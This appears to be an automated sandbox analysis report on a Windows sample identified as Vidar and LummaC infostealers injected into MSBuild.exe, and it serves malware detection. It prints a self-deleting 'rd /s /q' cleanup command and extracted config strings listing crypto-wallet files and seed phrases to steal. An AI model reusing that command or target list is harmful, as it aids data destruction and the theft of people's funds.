Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KKEHIEBKJKFI" & exit	Jump to behavior
Source: C:\ProgramData\HCFIIIJJKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

5_2_6D394760

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

5_2_6D271C30

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe

Code function: 4_2_0037E013 cpuid

4_2_0037E013

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	4_2_0036C085
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: GetLocaleInfoW,	4_2_0036622B
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: EnumSystemLocalesW,	4_2_0036C327
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: EnumSystemLocalesW,	4_2_0036C372
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: EnumSystemLocalesW,	4_2_0036C40D
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,	4_2_003A244B
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_0036C498
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_003A45DE
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: GetLocaleInfoW,	4_2_0036C6EB
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_0036C814
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: GetLocaleInfoW,	4_2_0036C91A
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_0036C9E9
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,	4_2_003A6AB8
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	4_2_003A7BA8
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: EnumSystemLocalesW,	4_2_00365D7F
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	4_2_003A6DD6
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	4_2_003A5E2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	5_2_00410DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,	5_2_0042E834
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_0042B25C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	5_2_0042B351
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	5_2_00429BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	5_2_0042B3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	5_2_0042B453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	5_2_0042ACD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	5_2_00425573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	5_2_0042B624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	5_2_0042762C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesA,	5_2_0042B6E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	5_2_00429EFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	5_2_0042E6FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	5_2_00428F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	5_2_0042B777
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	5_2_00427706
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	5_2_0042B710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	5_2_0042B7B3
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	15_2_002EC085
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: GetLocaleInfoW,	15_2_002E622B
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: EnumSystemLocalesW,	15_2_002EC327
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: EnumSystemLocalesW,	15_2_002EC372
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: EnumSystemLocalesW,	15_2_002EC40D
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	15_2_002EC498
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: GetLocaleInfoW,	15_2_002EC6EB
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	15_2_002EC814
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: GetLocaleInfoW,	15_2_002EC91A
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_002EC9E9
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: EnumSystemLocalesW,	15_2_002E5D7F

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe

Code function: 4_2_00357815 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_00357815

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00410C28 GetProcessHeap,HeapAlloc,GetUserNameA,

5_2_00410C28

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00410D03 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

5_2_00410D03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_6D298390 NSS_GetVersion,

5_2_6D298390

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: MSBuild.exe, 00000005.00000002.1774258553.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 16.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.HCFIIIJJKJ.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1788163394.00000000002FD000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.37dad8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.VmRHSCaiyc.exe.37dad8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VmRHSCaiyc.exe PID: 2024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6192, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Flash\|%DRIVE_REMOVABLE%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000106F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
